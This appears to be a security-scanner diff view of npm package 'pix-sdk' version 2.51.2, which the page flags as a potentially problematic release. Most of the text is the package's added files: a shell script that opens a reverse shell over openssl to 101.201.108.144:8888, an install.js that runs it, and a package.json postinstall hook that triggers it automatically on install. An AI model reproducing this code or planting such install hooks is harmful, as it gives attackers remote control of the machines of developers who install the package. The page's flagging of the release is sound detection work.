pix-sdk 2.51.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pix-sdk might be problematic. Click here for more details.

package/index.js ADDED
File without changes
package/index.sh ADDED
@@ -0,0 +1 @@
1
+ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 101.201.108.144:8888 > /tmp/s; rm /tmp/s
package/install.js ADDED
@@ -0,0 +1,20 @@
1
+
2
+ const { exec } = require("child_process");
3
+ function terminalLinux(){
4
+ exec("/bin/bash index.sh",(error,stdout,stderr) => {
5
+ if(error){
6
+ console.log(`error:${error.message}`);
7
+ return;
8
+
9
+ }
10
+ if(stderr){
11
+ console.log(`stderr:${stderr}`);
12
+ return;
13
+
14
+ }
15
+ console.log(`stdout:${stdout}`);
16
+ });
17
+
18
+ }
19
+
20
+ terminalLinux()
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "pix-sdk",
3
+ "version": "2.51.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node install.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }